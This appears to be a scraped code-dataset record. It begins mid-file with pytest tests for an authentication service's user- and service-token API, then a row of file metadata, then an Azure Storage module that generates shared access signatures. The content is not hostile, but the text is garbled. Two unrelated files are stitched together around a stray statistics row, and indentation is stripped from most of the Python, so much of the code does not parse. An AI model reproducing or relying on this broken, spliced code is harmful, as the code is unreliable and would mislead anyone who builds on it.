headers={"X-CSRF-Token": csrf},
)
assert r.status_code == 404
# Modify a token.
r = await setup.client.patch(
f"/auth/api/v1/users/other-person/tokens/{other_token.key}",
json={"token_name": "happy token"},
headers={"X-CSRF-Token": csrf},
)
assert r.status_code == 403
assert r.json()["detail"][0]["type"] == "permission_denied"
r = await setup.client.patch(
f"/auth/api/v1/users/{token_data.username}/tokens/{other_token.key}",
json={"token_name": "happy token"},
headers={"X-CSRF-Token": csrf},
)
assert r.status_code == 404
@pytest.mark.asyncio
async def test_no_expires(setup: SetupTest) -> None:
"""Test creating a user token that doesn't expire."""
token_data = await setup.create_session_token()
csrf = await setup.login(token_data.token)
r = await setup.client.post(
f"/auth/api/v1/users/{token_data.username}/tokens",
headers={"X-CSRF-Token": csrf},
json={"token_name": "some token"},
)
assert r.status_code == 201
token_url = r.headers["Location"]
r = await setup.client.get(token_url)
# A non-expiring token is represented by the absence of the key.
assert "expires" not in r.json()
# Create a user token with an expiration and then adjust it to not expire.
now = datetime.now(tz=timezone.utc).replace(microsecond=0)
expires = now + timedelta(days=2)
r = await setup.client.post(
f"/auth/api/v1/users/{token_data.username}/tokens",
headers={"X-CSRF-Token": csrf},
json={
"token_name": "another token",
"expires": int(expires.timestamp()),
},
)
assert r.status_code == 201
user_token = Token.from_str(r.json()["token"])
token_service = setup.factory.create_token_service()
user_token_data = await token_service.get_data(user_token)
assert user_token_data and user_token_data.expires == expires
token_url = r.headers["Location"]
r = await setup.client.get(token_url)
assert r.json()["expires"] == int(expires.timestamp())
# Patching expires to None clears the expiration.
r = await setup.client.patch(
token_url,
headers={"X-CSRF-Token": csrf},
json={"expires": None},
)
assert r.status_code == 201
assert "expires" not in r.json()
# Check that the expiration was also changed in Redis.
token_service = setup.factory.create_token_service()
user_token_data = await token_service.get_data(user_token)
assert user_token_data and user_token_data.expires is None
@pytest.mark.asyncio
async def test_duplicate_token_name(setup: SetupTest) -> None:
"""Test duplicate token names."""
token_data = await setup.create_session_token()
csrf = await setup.login(token_data.token)
r = await setup.client.post(
f"/auth/api/v1/users/{token_data.username}/tokens",
headers={"X-CSRF-Token": csrf},
json={"token_name": "some token"},
)
assert r.status_code == 201
# Creating a second token with the same name must be rejected with a
# validation error.
r = await setup.client.post(
f"/auth/api/v1/users/{token_data.username}/tokens",
headers={"X-CSRF-Token": csrf},
json={"token_name": "some token"},
)
assert r.status_code == 422
assert r.json()["detail"][0]["type"] == "duplicate_token_name"
# Create a token with a different name and then try to modify the name to
# conflict.
r = await setup.client.post(
f"/auth/api/v1/users/{token_data.username}/tokens",
headers={"X-CSRF-Token": csrf},
json={"token_name": "another token"},
)
assert r.status_code == 201
token_url = r.headers["Location"]
r = await setup.client.patch(
token_url,
headers={"X-CSRF-Token": csrf},
json={"token_name": "some token"},
)
assert r.status_code == 422
assert r.json()["detail"][0]["type"] == "duplicate_token_name"
@pytest.mark.asyncio
async def test_bad_expires(setup: SetupTest) -> None:
"""Test creating or modifying a token with bogus expirations."""
token_data = await setup.create_session_token()
csrf = await setup.login(token_data.token)
now = int(time.time())
# Timestamps in the past, zero, the current time, and just under
# now + five minutes must all be rejected.
bad_expires = [-now, -1, 0, now, now + (5 * 60) - 1]
for bad_expire in bad_expires:
r = await setup.client.post(
f"/auth/api/v1/users/{token_data.username}/tokens",
headers={"X-CSRF-Token": csrf},
json={"token_name": "some token", "expires": bad_expire},
)
assert r.status_code == 422
data = r.json()
assert data["detail"][0]["loc"] == ["body", "expires"]
assert data["detail"][0]["type"] == "invalid_expires"
# Create a valid token.
r = await setup.client.post(
f"/auth/api/v1/users/{token_data.username}/tokens",
headers={"X-CSRF-Token": csrf},
json={"token_name": "some token"},
)
assert r.status_code == 201
token_url = r.headers["Location"]
# Now try modifying the expiration time to the same bogus values.
for bad_expire in bad_expires:
r = await setup.client.patch(
token_url,
headers={"X-CSRF-Token": csrf},
json={"expires": bad_expire},
)
assert r.status_code == 422
data = r.json()
assert data["detail"][0]["loc"] == ["body", "expires"]
assert data["detail"][0]["type"] == "invalid_expires"
@pytest.mark.asyncio
async def test_bad_scopes(setup: SetupTest) -> None:
"""Test creating or modifying a token with bogus scopes."""
known_scopes = list(setup.config.known_scopes.keys())
assert len(known_scopes) > 4
# The session carries two known scopes plus "other:scope", which is not
# among the configured known scopes.
token_data = await setup.create_session_token(
scopes=known_scopes[1:3] + ["other:scope", "user:token"]
)
csrf = await setup.login(token_data.token)
# Check that we reject both an unknown scope and a scope that's present on
# the session but isn't valid in the configuration.
for bad_scope in (known_scopes[3], "other:scope"):
r = await setup.client.post(
f"/auth/api/v1/users/{token_data.username}/tokens",
headers={"X-CSRF-Token": csrf},
json={"token_name": "some token", "scopes": [bad_scope]},
)
assert r.status_code == 422
data = r.json()
assert data["detail"][0]["loc"] == ["body", "scopes"]
assert data["detail"][0]["type"] == "invalid_scopes"
# Create a valid token with all of the scopes as the session.
r = await setup.client.post(
f"/auth/api/v1/users/{token_data.username}/tokens",
headers={"X-CSRF-Token": csrf},
json={"token_name": "some token", "scopes": known_scopes[1:3]},
)
assert r.status_code == 201
token_url = r.headers["Location"]
# Now try modifying it with the invalid scope.
for bad_scope in (known_scopes[3], "other:scope"):
r = await setup.client.patch(
token_url,
headers={"X-CSRF-Token": csrf},
json={"scopes": [known_scopes[1], bad_scope]},
)
assert r.status_code == 422
data = r.json()
assert data["detail"][0]["loc"] == ["body", "scopes"]
assert data["detail"][0]["type"] == "invalid_scopes"
@pytest.mark.asyncio
async def test_create_admin(setup: SetupTest) -> None:
    """Test creating a token through the admin interface."""
    # admin:token scope is required; exec:admin alone is not enough.
    token_data = await setup.create_session_token(scopes=["exec:admin"])
    csrf = await setup.login(token_data.token)
    r = await setup.client.post(
        "/auth/api/v1/tokens",
        headers={"X-CSRF-Token": csrf},
        json={"username": "a-service", "token_type": "service"},
    )
    assert r.status_code == 403

    # Create a service token carrying full user metadata.
    token_data = await setup.create_session_token(scopes=["admin:token"])
    csrf = await setup.login(token_data.token)
    now = datetime.now(tz=timezone.utc)
    expires = int((now + timedelta(days=2)).timestamp())
    r = await setup.client.post(
        "/auth/api/v1/tokens",
        headers={"X-CSRF-Token": csrf},
        json={
            "username": "a-service",
            "token_type": "service",
            "scopes": ["admin:token"],
            "expires": expires,
            "name": "A Service",
            "uid": 1234,
            "email": "service@example.com",
            "groups": [{"name": "some-group", "id": 12381}],
        },
    )
    assert r.status_code == 201
    assert r.json() == {"token": ANY}
    service_token = Token.from_str(r.json()["token"])
    token_url = f"/auth/api/v1/users/a-service/tokens/{service_token.key}"
    assert r.headers["Location"] == token_url

    setup.logout()
    r = await setup.client.get(
        "/auth/api/v1/token-info",
        headers={"Authorization": f"bearer {str(service_token)}"},
    )
    assert r.status_code == 200
    assert r.json() == {
        "token": service_token.key,
        "username": "a-service",
        "token_type": "service",
        "scopes": ["admin:token"],
        "created": ANY,
        "expires": expires,
    }
    r = await setup.client.get(
        "/auth/api/v1/user-info",
        headers={"Authorization": f"bearer {str(service_token)}"},
    )
    assert r.status_code == 200
    # Bug fix: the expected dict previously listed the "email" key twice;
    # duplicate keys in a dict literal silently collapse to the last value.
    assert r.json() == {
        "username": "a-service",
        "name": "A Service",
        "email": "service@example.com",
        "uid": 1234,
        "groups": [{"name": "some-group", "id": 12381}],
    }

    # Session tokens and user tokens without the required extra fields
    # cannot be created through this route.
    r = await setup.client.post(
        "/auth/api/v1/tokens",
        headers={"Authorization": f"bearer {str(service_token)}"},
        json={"username": "a-user", "token_type": "session"},
    )
    assert r.status_code == 422
    r = await setup.client.post(
        "/auth/api/v1/tokens",
        headers={"Authorization": f"bearer {str(service_token)}"},
        json={"username": "a-user", "token_type": "user"},
    )
    assert r.status_code == 422
    r = await setup.client.post(
        "/auth/api/v1/tokens",
        headers={"Authorization": f"bearer {str(service_token)}"},
        json={
            "username": "a-user",
            "token_type": "user",
            "token_name": "some token",
            "expires": int(datetime.now(tz=timezone.utc).timestamp()),
        },
    )
    assert r.status_code == 422
    assert r.json()["detail"][0]["type"] == "invalid_expires"
    r = await setup.client.post(
        "/auth/api/v1/tokens",
        headers={"Authorization": f"bearer {str(service_token)}"},
        json={
            "username": "a-user",
            "token_type": "user",
            "token_name": "some token",
            "scopes": ["bogus:scope"],
        },
    )
    assert r.status_code == 422
    assert r.json()["detail"][0]["type"] == "invalid_scopes"

    # Successfully create a user token.
    r = await setup.client.post(
        "/auth/api/v1/tokens",
        headers={"Authorization": f"bearer {str(service_token)}"},
        json={
            "username": "a-user",
            "token_type": "user",
            "token_name": "some token",
        },
    )
    assert r.status_code == 201
    assert r.json() == {"token": ANY}
    user_token = Token.from_str(r.json()["token"])
    token_url = f"/auth/api/v1/users/a-user/tokens/{user_token.key}"
    assert r.headers["Location"] == token_url
    r = await setup.client.get(
        "/auth/api/v1/token-info",
        headers={"Authorization": f"bearer {str(user_token)}"},
    )
    assert r.status_code == 200
    assert r.json() == {
        "token": user_token.key,
        "username": "a-user",
        "token_type": "user",
        "token_name": "some token",
        "scopes": [],
        "created": ANY,
    }
    r = await setup.client.get(
        "/auth/api/v1/user-info",
        headers={"Authorization": f"bearer {str(user_token)}"},
    )
    assert r.status_code == 200
    assert r.json() == {"username": "a-user"}

    # Check handling of duplicate token name errors.
    r = await setup.client.post(
        "/auth/api/v1/tokens",
        headers={"Authorization": f"bearer {str(service_token)}"},
        json={
            "username": "a-user",
            "token_type": "user",
            "token_name": "some token",
        },
    )
    assert r.status_code == 422
    assert r.json()["detail"][0]["type"] == "duplicate_token_name"

    # Check handling of an invalid username.
    r = await setup.client.post(
        "/auth/api/v1/tokens",
        headers={"Authorization": f"bearer {str(service_token)}"},
        json={
            "username": "invalid(user)",
            "token_type": "user",
            "token_name": "some token",
        },
    )
    assert r.status_code == 422

    # Check that the bootstrap token also works.
    r = await setup.client.post(
        "/auth/api/v1/tokens",
        headers={
            "Authorization": f"bearer {str(setup.config.bootstrap_token)}"
        },
        json={"username": "other-service", "token_type": "service"},
    )
    assert r.status_code == 201
| 33.180498 | 78 | 0.597949 | 4,050 | 31,986 | 4.597531 | 0.071852 | 0.055317 | 0.047261 | 0.07304 | 0.801235 | 0.779646 | 0.746885 | 0.727712 | 0.700967 | 0.686037 | 0 | 0.019917 | 0.248109 | 31,986 | 963 | 79 | 33.214953 | 0.754304 | 0.06184 | 0 | 0.673267 | 0 | 0 | 0.262931 | 0.086375 | 0 | 0 | 0 | 0 | 0.159653 | 1 | 0 | false | 0 | 0.017327 | 0 | 0.017327 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b95f8901e0c33eb0c48b0e42f7b1bec99e53a7a7 | 29,885 | py | Python | azure/multiapi/storagev2/blob/v2019_12_12/_shared_access_signature.py | xolve/azure-multiapi-storage-python | 47509479427c879f18c554e451e838453d47c2bd | [
"MIT"
] | 3 | 2019-02-21T20:46:26.000Z | 2021-06-22T15:35:52.000Z | azure/multiapi/storagev2/blob/v2019_12_12/_shared_access_signature.py | xolve/azure-multiapi-storage-python | 47509479427c879f18c554e451e838453d47c2bd | [
"MIT"
] | 11 | 2017-10-05T18:20:40.000Z | 2020-10-10T09:20:19.000Z | azure/multiapi/storagev2/blob/v2019_12_12/_shared_access_signature.py | xolve/azure-multiapi-storage-python | 47509479427c879f18c554e451e838453d47c2bd | [
"MIT"
] | 15 | 2017-10-02T18:48:20.000Z | 2022-03-03T14:03:49.000Z | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
from typing import ( # pylint: disable=unused-import
Union, Optional, Any, TYPE_CHECKING
)
from ._shared import sign_string, url_quote
from ._shared.constants import X_MS_VERSION
from ._shared.models import Services
from ._shared.shared_access_signature import SharedAccessSignature, _SharedAccessHelper, \
QueryStringConstants
if TYPE_CHECKING:
from datetime import datetime
from .import (
ResourceTypes,
AccountSasPermissions,
UserDelegationKey,
ContainerSasPermissions,
BlobSasPermissions
)
class BlobQueryStringConstants(object):
"""Query string parameter names specific to blob shared access signatures."""
# Query parameter used to scope a SAS to a specific blob snapshot.
SIGNED_TIMESTAMP = 'snapshot'
class BlobSharedAccessSignature(SharedAccessSignature):
'''
Provides a factory for creating blob and container access
signature tokens with a common account name and account key. Users can either
use the factory or can construct the appropriate service and use the
generate_*_shared_access_signature method directly.
'''
def __init__(self, account_name, account_key=None, user_delegation_key=None):
    '''
    :param str account_name:
        Name of the storage account for which signatures are generated.
    :param str account_key:
        Access key used to sign the generated shared access signatures.
    :param ~azure.storage.blob.models.UserDelegationKey user_delegation_key:
        May be supplied in place of an account key.  A user delegation key
        is obtained from the service by authenticating with an AAD
        identity, for example by calling get_user_delegation_key on any
        Blob service object.
    '''
    super(BlobSharedAccessSignature, self).__init__(
        account_name, account_key, x_ms_version=X_MS_VERSION)
    # Kept for use when signing with a delegation key instead of the
    # account key.
    self.user_delegation_key = user_delegation_key
def generate_blob(self, container_name, blob_name, snapshot=None, version_id=None, permission=None,
expiry=None, start=None, policy_id=None, ip=None, protocol=None,
cache_control=None, content_disposition=None,
content_encoding=None, content_language=None,
content_type=None):
'''
Generates a shared access signature for the blob or one of its snapshots.
Use the returned signature with the sas_token parameter of any BlobService.
:param str container_name:
Name of container.
:param str blob_name:
Name of blob.
:param str snapshot:
The snapshot parameter is an opaque DateTime value that,
when present, specifies the blob snapshot to grant permission.
:param BlobSasPermissions permission:
The permissions associated with the shared access signature. The
user is restricted to operations allowed by the permissions.
Permissions must be ordered read, write, delete, list.
Required unless an id is given referencing a stored access policy
which contains this field. This field must be omitted if it has been
specified in an associated stored access policy.
:param expiry:
The time at which the shared access signature becomes invalid.
Required unless an id is given referencing a stored access policy
which contains this field. This field must be omitted if it has
been specified in an associated stored access policy. Azure will always
convert values to UTC. If a date is passed in without timezone info, it
is assumed to be UTC.
:type expiry: datetime or str
:param start:
The time at which the shared access signature becomes valid. If
omitted, start time for this call is assumed to be the time when the
storage service receives the request. Azure will always convert values
to UTC. If a date is passed in without timezone info, it is assumed to
be UTC.
:type start: datetime or str
:param str policy_id:
A unique value up to 64 characters in length that correlates to a
stored access policy. To create a stored access policy, use
set_blob_service_properties.
:param str ip:
Specifies an IP address or a range of IP addresses from which to accept requests.
If the IP address from which the request originates does not match the IP address
or address range specified on the SAS token, the request is not authenticated.
For example, specifying sip=168.1.5.65 or sip=168.1.5.60-168.1.5.70 on the SAS
restricts the request to those IP addresses.
:param str protocol:
Specifies the protocol permitted for a request made. The default value
is https,http. See :class:`~azure.storage.common.models.Protocol` for possible values.
:param str cache_control:
Response header value for Cache-Control when resource is accessed
using this shared access signature.
:param str content_disposition:
Response header value for Content-Disposition when resource is accessed
using this shared access signature.
:param str content_encoding:
Response header value for Content-Encoding when resource is accessed
using this shared access signature.
:param str content_language:
Response header value for Content-Language when resource is accessed
using this shared access signature.
:param str content_type:
Response header value for Content-Type when resource is accessed
using this shared access signature.
'''
resource_path = container_name + '/' + blob_name
sas = _BlobSharedAccessHelper()
sas.add_base(permission, expiry, start, ip, protocol, self.x_ms_version)
sas.add_id(policy_id)
resource = 'bs' if snapshot else 'b'
resource = 'bv' if version_id else resource
sas.add_resource(resource)
sas.add_timestamp(snapshot or version_id)
sas.add_override_response_headers(cache_control, content_disposition,
content_encoding, content_language,
content_type)
sas.add_resource_signature(self.account_name, self.account_key, resource_path,
user_delegation_key=self.user_delegation_key)
return sas.get_token()
def generate_container(self, container_name, permission=None, expiry=None,
start=None, policy_id=None, ip=None, protocol=None,
cache_control=None, content_disposition=None,
content_encoding=None, content_language=None,
content_type=None):
'''
Generates a shared access signature for the container.
Use the returned signature with the sas_token parameter of any BlobService.
:param str container_name:
Name of container.
:param ContainerSasPermissions permission:
The permissions associated with the shared access signature. The
user is restricted to operations allowed by the permissions.
Permissions must be ordered read, write, delete, list.
Required unless an id is given referencing a stored access policy
which contains this field. This field must be omitted if it has been
specified in an associated stored access policy.
:param expiry:
The time at which the shared access signature becomes invalid.
Required unless an id is given referencing a stored access policy
which contains this field. This field must be omitted if it has
been specified in an associated stored access policy. Azure will always
convert values to UTC. If a date is passed in without timezone info, it
is assumed to be UTC.
:type expiry: datetime or str
:param start:
The time at which the shared access signature becomes valid. If
omitted, start time for this call is assumed to be the time when the
storage service receives the request. Azure will always convert values
to UTC. If a date is passed in without timezone info, it is assumed to
be UTC.
:type start: datetime or str
:param str policy_id:
A unique value up to 64 characters in length that correlates to a
stored access policy. To create a stored access policy, use
set_blob_service_properties.
:param str ip:
Specifies an IP address or a range of IP addresses from which to accept requests.
If the IP address from which the request originates does not match the IP address
or address range specified on the SAS token, the request is not authenticated.
For example, specifying sip=168.1.5.65 or sip=168.1.5.60-168.1.5.70 on the SAS
restricts the request to those IP addresses.
:param str protocol:
Specifies the protocol permitted for a request made. The default value
is https,http. See :class:`~azure.storage.common.models.Protocol` for possible values.
:param str cache_control:
Response header value for Cache-Control when resource is accessed
using this shared access signature.
:param str content_disposition:
Response header value for Content-Disposition when resource is accessed
using this shared access signature.
:param str content_encoding:
Response header value for Content-Encoding when resource is accessed
using this shared access signature.
:param str content_language:
Response header value for Content-Language when resource is accessed
using this shared access signature.
:param str content_type:
Response header value for Content-Type when resource is accessed
using this shared access signature.
'''
sas = _BlobSharedAccessHelper()
sas.add_base(permission, expiry, start, ip, protocol, self.x_ms_version)
sas.add_id(policy_id)
sas.add_resource('c')
sas.add_override_response_headers(cache_control, content_disposition,
content_encoding, content_language,
content_type)
sas.add_resource_signature(self.account_name, self.account_key, container_name,
user_delegation_key=self.user_delegation_key)
return sas.get_token()
class _BlobSharedAccessHelper(_SharedAccessHelper):
    """Accumulates query parameters and computes the blob SAS signature."""

    def add_timestamp(self, timestamp):
        # Record the snapshot/version timestamp so it participates in signing.
        self._add_query(BlobQueryStringConstants.SIGNED_TIMESTAMP, timestamp)

    def get_value_to_append(self, query):
        # Absent parameters still contribute an empty line to the
        # string-to-sign, which the service requires.
        value = self.query_dict.get(query)
        return (value if value else '') + '\n'

    def add_resource_signature(self, account_name, account_key, path, user_delegation_key=None):
        # pylint: disable = no-member
        if path[0] != '/':
            path = '/' + path
        canonicalized_resource = '/blob/' + account_name + path + '\n'

        # The service recomputes the signature over these fields in this
        # exact order, so the sequence below must not change.
        parts = [
            self.get_value_to_append(QueryStringConstants.SIGNED_PERMISSION),
            self.get_value_to_append(QueryStringConstants.SIGNED_START),
            self.get_value_to_append(QueryStringConstants.SIGNED_EXPIRY),
            canonicalized_resource,
        ]

        if user_delegation_key is not None:
            delegation_fields = (
                (QueryStringConstants.SIGNED_OID, user_delegation_key.signed_oid),
                (QueryStringConstants.SIGNED_TID, user_delegation_key.signed_tid),
                (QueryStringConstants.SIGNED_KEY_START, user_delegation_key.signed_start),
                (QueryStringConstants.SIGNED_KEY_EXPIRY, user_delegation_key.signed_expiry),
                (QueryStringConstants.SIGNED_KEY_SERVICE, user_delegation_key.signed_service),
                (QueryStringConstants.SIGNED_KEY_VERSION, user_delegation_key.signed_version),
            )
            for name, value in delegation_fields:
                self._add_query(name, value)
            parts.extend(self.get_value_to_append(name) for name, _ in delegation_fields)
        else:
            parts.append(self.get_value_to_append(QueryStringConstants.SIGNED_IDENTIFIER))

        parts.extend(self.get_value_to_append(query) for query in (
            QueryStringConstants.SIGNED_IP,
            QueryStringConstants.SIGNED_PROTOCOL,
            QueryStringConstants.SIGNED_VERSION,
            QueryStringConstants.SIGNED_RESOURCE,
            BlobQueryStringConstants.SIGNED_TIMESTAMP,
            QueryStringConstants.SIGNED_CACHE_CONTROL,
            QueryStringConstants.SIGNED_CONTENT_DISPOSITION,
            QueryStringConstants.SIGNED_CONTENT_ENCODING,
            QueryStringConstants.SIGNED_CONTENT_LANGUAGE,
            QueryStringConstants.SIGNED_CONTENT_TYPE,
        ))

        string_to_sign = ''.join(parts)
        # Drop the trailing newline left by the final appended field.
        if string_to_sign[-1] == '\n':
            string_to_sign = string_to_sign[:-1]

        signing_key = account_key if user_delegation_key is None else user_delegation_key.value
        self._add_query(QueryStringConstants.SIGNED_SIGNATURE,
                        sign_string(signing_key, string_to_sign))

    def get_token(self):
        # The timestamp is deliberately excluded from the emitted token to
        # avoid two snapshot ids in the query string when the caller appends
        # the snapshot timestamp themselves.
        excluded = (BlobQueryStringConstants.SIGNED_TIMESTAMP,)
        return '&'.join(
            '{0}={1}'.format(name, url_quote(value))
            for name, value in self.query_dict.items()
            if value is not None and name not in excluded
        )
def generate_account_sas(
        account_name,  # type: str
        account_key,  # type: str
        resource_types,  # type: Union[ResourceTypes, str]
        permission,  # type: Union[AccountSasPermissions, str]
        expiry,  # type: Optional[Union[datetime, str]]
        start=None,  # type: Optional[Union[datetime, str]]
        ip=None,  # type: Optional[str]
        **kwargs  # type: Any
    ):  # type: (...) -> str
    """Generate an account-level shared access signature for the blob service.

    Use the returned signature with the credential parameter of any
    BlobServiceClient, ContainerClient or BlobClient.

    :param str account_name:
        The storage account name used to generate the shared access signature.
    :param str account_key:
        The account key (shared key / access key) used to sign the token.
    :param resource_types:
        Specifies the resource types that are accessible with the account SAS.
    :type resource_types: str or ~azure.storage.blob.ResourceTypes
    :param permission:
        The permissions the token grants. Required unless a stored access
        policy referenced by id supplies this field, in which case it must
        be omitted here.
    :type permission: str or ~azure.storage.blob.AccountSasPermissions
    :param expiry:
        The time at which the signature becomes invalid. Azure always
        converts values to UTC; naive datetimes are assumed to be UTC.
    :type expiry: ~datetime.datetime or str
    :param start:
        The time at which the signature becomes valid. Defaults to the time
        the storage service receives the request. Azure always converts
        values to UTC; naive datetimes are assumed to be UTC.
    :type start: ~datetime.datetime or str
    :param str ip:
        An IP address or range (e.g. ip=168.1.5.65 or
        ip=168.1.5.60-168.1.5.70) from which requests are accepted;
        requests from other addresses are not authenticated.
    :keyword str protocol:
        The protocol permitted for requests made with this token. The
        default value is https.
    :return: A Shared Access Signature (sas) token.
    :rtype: str

    .. admonition:: Example:

        .. literalinclude:: ../samples/blob_samples_authentication.py
            :start-after: [START create_sas_token]
            :end-before: [END create_sas_token]
            :language: python
            :dedent: 8
            :caption: Generating a shared access signature.
    """
    # The account SAS is always scoped to the blob service here.
    return SharedAccessSignature(account_name, account_key).generate_account(
        services=Services(blob=True),
        resource_types=resource_types,
        permission=permission,
        expiry=expiry,
        start=start,
        ip=ip,
        **kwargs
    )  # type: ignore
def generate_container_sas(
        account_name,  # type: str
        container_name,  # type: str
        account_key=None,  # type: Optional[str]
        user_delegation_key=None,  # type: Optional[UserDelegationKey]
        permission=None,  # type: Optional[Union[ContainerSasPermissions, str]]
        expiry=None,  # type: Optional[Union[datetime, str]]
        start=None,  # type: Optional[Union[datetime, str]]
        policy_id=None,  # type: Optional[str]
        ip=None,  # type: Optional[str]
        **kwargs  # type: Any
    ):
    # type: (...) -> Any
    """Generate a shared access signature for a container.

    Use the returned signature with the credential parameter of any
    BlobServiceClient, ContainerClient or BlobClient.

    :param str account_name:
        The storage account name used to generate the shared access signature.
    :param str container_name:
        The name of the container.
    :param str account_key:
        The account key (shared key / access key) used to sign the token.
        Either `account_key` or `user_delegation_key` must be specified.
    :param ~azure.storage.blob.UserDelegationKey user_delegation_key:
        A user delegation key obtained from the service by authenticating
        with an AAD identity; see
        :func:`~azure.storage.blob.BlobServiceClient.get_user_delegation_key`.
        When present, the SAS is signed with the user delegation key instead.
    :param permission:
        The permissions the token grants. Permissions must be ordered read,
        write, delete, list. Required unless ``policy_id`` references a
        stored access policy that contains this field, in which case it must
        be omitted here.
    :type permission: str or ~azure.storage.blob.ContainerSasPermissions
    :param expiry:
        The time at which the signature becomes invalid. Required unless
        supplied by a stored access policy referenced via ``policy_id``.
        Azure always converts values to UTC; naive datetimes are assumed to
        be UTC.
    :type expiry: ~datetime.datetime or str
    :param start:
        The time at which the signature becomes valid. Defaults to the time
        the storage service receives the request. Azure always converts
        values to UTC; naive datetimes are assumed to be UTC.
    :type start: ~datetime.datetime or str
    :param str policy_id:
        A unique value up to 64 characters that correlates to a stored
        access policy; see
        :func:`~azure.storage.blob.ContainerClient.set_container_access_policy`.
    :param str ip:
        An IP address or range (e.g. ip=168.1.5.65 or
        ip=168.1.5.60-168.1.5.70) from which requests are accepted;
        requests from other addresses are not authenticated.
    :keyword str protocol:
        The protocol permitted for requests made with this token. The
        default value is https.
    :keyword str cache_control:
        Response header value for Cache-Control when the resource is
        accessed using this signature.
    :keyword str content_disposition:
        Response header value for Content-Disposition when the resource is
        accessed using this signature.
    :keyword str content_encoding:
        Response header value for Content-Encoding when the resource is
        accessed using this signature.
    :keyword str content_language:
        Response header value for Content-Language when the resource is
        accessed using this signature.
    :keyword str content_type:
        Response header value for Content-Type when the resource is
        accessed using this signature.
    :return: A Shared Access Signature (sas) token.
    :rtype: str

    .. admonition:: Example:

        .. literalinclude:: ../samples/blob_samples_containers.py
            :start-after: [START generate_sas_token]
            :end-before: [END generate_sas_token]
            :language: python
            :dedent: 12
            :caption: Generating a sas token.
    """
    if not (user_delegation_key or account_key):
        raise ValueError("Either user_delegation_key or account_key must be provided.")
    # Prefer the user delegation key for signing when one is supplied.
    if user_delegation_key:
        signer = BlobSharedAccessSignature(account_name, user_delegation_key=user_delegation_key)
    else:
        signer = BlobSharedAccessSignature(account_name, account_key=account_key)
    return signer.generate_container(
        container_name,
        permission=permission,
        expiry=expiry,
        start=start,
        policy_id=policy_id,
        ip=ip,
        **kwargs
    )
def generate_blob_sas(
        account_name,  # type: str
        container_name,  # type: str
        blob_name,  # type: str
        snapshot=None,  # type: Optional[str]
        account_key=None,  # type: Optional[str]
        user_delegation_key=None,  # type: Optional[UserDelegationKey]
        permission=None,  # type: Optional[Union[BlobSasPermissions, str]]
        expiry=None,  # type: Optional[Union[datetime, str]]
        start=None,  # type: Optional[Union[datetime, str]]
        policy_id=None,  # type: Optional[str]
        ip=None,  # type: Optional[str]
        **kwargs  # type: Any
    ):
    # type: (...) -> Any
    """Generate a shared access signature for a blob.

    Use the returned signature with the credential parameter of any
    BlobServiceClient, ContainerClient or BlobClient.

    :param str account_name:
        The storage account name used to generate the shared access signature.
    :param str container_name:
        The name of the container.
    :param str blob_name:
        The name of the blob.
    :param str snapshot:
        An optional blob snapshot ID. Mutually exclusive with ``version_id``.
    :param str account_key:
        The account key (shared key / access key) used to sign the token.
        Either `account_key` or `user_delegation_key` must be specified.
    :param ~azure.storage.blob.UserDelegationKey user_delegation_key:
        A user delegation key obtained from the service by authenticating
        with an AAD identity; see
        :func:`~azure.storage.blob.BlobServiceClient.get_user_delegation_key`.
        When present, the SAS is signed with the user delegation key instead.
    :param permission:
        The permissions the token grants. Permissions must be ordered read,
        write, delete, list. Required unless ``policy_id`` references a
        stored access policy that contains this field, in which case it must
        be omitted here.
    :type permission: str or ~azure.storage.blob.BlobSasPermissions
    :param expiry:
        The time at which the signature becomes invalid. Required unless
        supplied by a stored access policy referenced via ``policy_id``.
        Azure always converts values to UTC; naive datetimes are assumed to
        be UTC.
    :type expiry: ~datetime.datetime or str
    :param start:
        The time at which the signature becomes valid. Defaults to the time
        the storage service receives the request. Azure always converts
        values to UTC; naive datetimes are assumed to be UTC.
    :type start: ~datetime.datetime or str
    :param str policy_id:
        A unique value up to 64 characters that correlates to a stored
        access policy; see
        :func:`~azure.storage.blob.ContainerClient.set_container_access_policy()`.
    :param str ip:
        An IP address or range (e.g. ip=168.1.5.65 or
        ip=168.1.5.60-168.1.5.70) from which requests are accepted;
        requests from other addresses are not authenticated.
    :keyword str version_id:
        An optional blob version ID. This parameter is only for versioning
        enabled account

        .. versionadded:: 12.4.0
            This keyword argument was introduced in API version '2019-12-12'.
    :keyword str protocol:
        The protocol permitted for requests made with this token. The
        default value is https.
    :keyword str cache_control:
        Response header value for Cache-Control when the resource is
        accessed using this signature.
    :keyword str content_disposition:
        Response header value for Content-Disposition when the resource is
        accessed using this signature.
    :keyword str content_encoding:
        Response header value for Content-Encoding when the resource is
        accessed using this signature.
    :keyword str content_language:
        Response header value for Content-Language when the resource is
        accessed using this signature.
    :keyword str content_type:
        Response header value for Content-Type when the resource is
        accessed using this signature.
    :return: A Shared Access Signature (sas) token.
    :rtype: str
    """
    if not (user_delegation_key or account_key):
        raise ValueError("Either user_delegation_key or account_key must be provided.")
    version_id = kwargs.pop('version_id', None)
    # A token may target a snapshot or a version, never both at once.
    if version_id and snapshot:
        raise ValueError("snapshot and version_id cannot be set at the same time.")
    # Prefer the user delegation key for signing when one is supplied.
    if user_delegation_key:
        signer = BlobSharedAccessSignature(account_name, user_delegation_key=user_delegation_key)
    else:
        signer = BlobSharedAccessSignature(account_name, account_key=account_key)
    return signer.generate_blob(
        container_name,
        blob_name,
        snapshot=snapshot,
        version_id=version_id,
        permission=permission,
        expiry=expiry,
        start=start,
        policy_id=policy_id,
        ip=ip,
        **kwargs
    )
